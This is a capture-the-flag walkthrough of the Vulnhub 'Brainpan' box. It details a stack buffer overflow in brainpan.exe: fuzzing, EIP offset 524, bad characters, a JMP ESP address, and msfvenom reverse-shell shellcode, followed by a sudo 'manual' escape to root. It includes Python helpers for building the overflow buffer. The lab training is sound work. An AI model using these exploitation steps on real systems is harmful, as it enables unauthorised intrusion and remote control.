Vulnhub virtual machine; OSCP Buffer-Overflow prep. “Where we’re going we don’t need roads”. This box is a perfect test of skills in regards to buffer overflows: you will work on crafting an overflow that leads to a reverse shell. The escalation on the box stems from a pivot via the manual command.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Discover VM on network
We have identified several interesting ports:
9999 - unknown service, but it greets with “WELCOME TO BRAINPAN”
10000 - SimpleHTTPServer with some type of base64nc
Navigating to port 10000 leads to this image.
Nothing much left to look at.
Connecting to port 9999
We have a password field which we can try to brute force. Never mind, it just returns connection refused after several attempts.
webmin is possibly an interesting user.
Continuing enumeration with dirbuster
brainpan.exe discovered - download it locally to investigate.
PE32 executable - looks like we’ll be doing some reverse engineering.
Opening the file with wine
hmm, port 9999 - let’s try and connect to localhost on 9999
we received a callback to brainpan.exe on port 9999
attempting a password of
The password looks to have pushed 9 bytes to the buffer.
Load brainpan.exe into OllyDbg
Press Start twice to run; a secondary window (popup) appears.
The application is running correctly and awaiting connections on port 9999.
Goal: gain control of ESP and EIP, then use a JMP ESP to run shellcode that gives us a reverse shell.
Create bfuzz.py (a fuzzing script) and launch it against the application
and finally a crash of the program at around 600 bytes.
Create a pattern with Metasploit
and add it to the buffer skeleton file.
Buffer Skeleton File (
add pattern_create string to buff-skel.py
Now the buffer is 600 bytes of non-repeating data.
Execute buff-skel.py in an attempt to find exactly where the application crashes.
Verifying the data got sent to the application via Olly
The application is confirmed killed via an access violation when executing -
EIP = 35724134 (highlighted in the registers)
We need to find the exact offset of EIP with
Offset = 524 - the exact number of bytes required to be sent to the application to cause the crash
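The offset lookup above is shown with Metasploit's pattern tools; as an added example (not the post's bfuzz.py or buff-skel.py), here is the same cyclic-pattern technique in plain Python, fed the crash EIP from the post, plus the buffer layout the post builds (A filler, 4-byte EIP overwrite, C padding). Function names are my own.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern; every 4-byte window is unique
    up to 20280 bytes, which is what makes the offset lookup unambiguous."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip_value, length=600):
    """EIP as read from OllyDbg (e.g. 0x35724134) -> offset into the pattern.
    x86 is little-endian, so the register holds the 4 pattern bytes reversed
    ("4Ar5" for 0x35724134). Returns None if the value is not from the pattern."""
    needle = struct.pack("<I", eip_value)
    offset = pattern_create(length).encode("ascii").find(needle)
    return None if offset < 0 else offset


def build_skeleton(offset, eip, total=1400):
    """Layout from the post: filler A's, the 4-byte EIP overwrite, then C
    padding where ESP points after the crash (the shellcode area).
    'eip' is raw bytes (b'BBBB' to prove control) or an int address."""
    ret = struct.pack("<I", eip) if isinstance(eip, int) else eip
    pad = max(0, total - offset - len(ret))
    return b"A" * offset + ret + b"C" * pad


if __name__ == "__main__":
    off = pattern_offset(0x35724134)  # crash EIP from the post -> 524
    print("offset:", off)
    buf = build_skeleton(off, b"BBBB")
    print("A's:", buf.count(b"A"), "EIP:", buf[off:off + 4], "C's:", buf.count(b"C"))
```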
Adjust buff-skel.py to send exactly 524 “A”s to brainpan
We want to fill the EIP value with something recognisable so we can determine whether we’ve taken it over.
Restart application in OllyDbg
Crash the application with buff-skel.py
Now it shows that we have replaced the registers:
EBP: 41414141 = A’s
EIP: 42424242 = B’s
Following the ESP dump brings us to the C’s, and this is the area where our generated shellcode will be placed.
Shellcode is normally about 300 bytes on average.
Restart application in OllyDbg
Currently we have about 60 bytes of space to work with, so we need to add more space to the C area by changing the 600 to 1400.
A significant number of C’s - plenty of space available for the shellcode.
Keep in mind bad characters for Buffer Overflows https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
A great write-up is available by Georgia Weidman #hailGeorgia
Testing For Bad Characters
Add the badchars to buff-skel
Run buff-skel with the badchars
The hex dump shows the badchars sent directly after the A’s and B’s. If there is a gap in the sequence we can see exactly which char is bad.
Note: if the shellcode doesn’t work, it’s probably a badchar stopping you.
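To make the “gap in the sequence” check above repeatable, here is an added example (not code from the post) that compares the badchar sequence sent with the bytes seen in the ESP dump and reports the first byte that did not survive. The `_fake_dump` target is constructed purely to show the mechanics (it drops 0x0a and truncates at 0x0d); brainpan itself only rejects \x00, as the post says.

```python
def badchar_sequence(exclude=(0x00,)):
    """0x01..0xff with the bytes already known to be bad (here \\x00) left out."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent, observed):
    """Return (position, expected_byte) for the first byte that did not arrive
    intact in the memory dump, or None if the whole sequence is present.
    Only the first break is reported: once the application truncates or
    mangles its input, everything after that point is unreliable, so remove
    the byte, resend and check again."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return i, expected
    return None


def find_all_bad_chars(sent, dump_func, max_rounds=10):
    """Iterative version: dump_func(sequence) stands in for 'resend and read
    the ESP dump'. Collects every bad byte found across the rounds."""
    bad = []
    for _ in range(max_rounds):
        hit = first_bad_char(sent, dump_func(sent))
        if hit is None:
            return bad
        bad.append(hit[1])
        sent = bytes(b for b in sent if b != hit[1])
    raise RuntimeError("too many bad characters; check the test setup")


# Constructed stand-in for a target (NOT brainpan's real behaviour): drops
# every 0x0a and truncates the buffer at the first 0x0d.
def _fake_dump(seq):
    seq = seq.replace(b"\x0a", b"")
    return seq.split(b"\x0d")[0]


if __name__ == "__main__":
    seq = badchar_sequence()
    print("first gap:", first_bad_char(seq, _fake_dump(seq)))   # (9, 0x0a)
    print("all bad:", [hex(b) for b in find_all_bad_chars(seq, _fake_dump)])
```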
Finding the JMP ESP
JMP ESP = 311712f3 - with this address we can have execution jump to our shellcode.
Adjust buff-skel.py to add the JMP ESP address
Before executing, add a breakpoint in OllyDbg on the JMP ESP, which will now stop at this point when the application is run.
Execute buff-skel.py - hit breakpoint
and the jmp directs execution right to the C’s where our shellcode will exist.
Creating Shellcode Payload
Reverse shellcode via msfvenom
-b = the badchars to avoid (we know \x00 is a no-go)
Add the shellcode to buff-skel.py
Setup NC Listener
In some cases the nc listener just doesn’t function properly, and that’s when you need to switch to Metasploit’s.
Setup Metasploit Listener. Note: for the OSCP exam you are allowed to use the Metasploit multi/handler listener as much as you want.
Launch Metasploit (fastest way)
Connection made after the buffer overflow
Upgrade to TTY
Quick check of sudo abilities
anansi_util can be run as root
and looks to be a wrapper for manual [command], which looks like a good way to escalate.
Escalation via vi:
enter the escape sequence
Gimme the loot!
Bring me the root!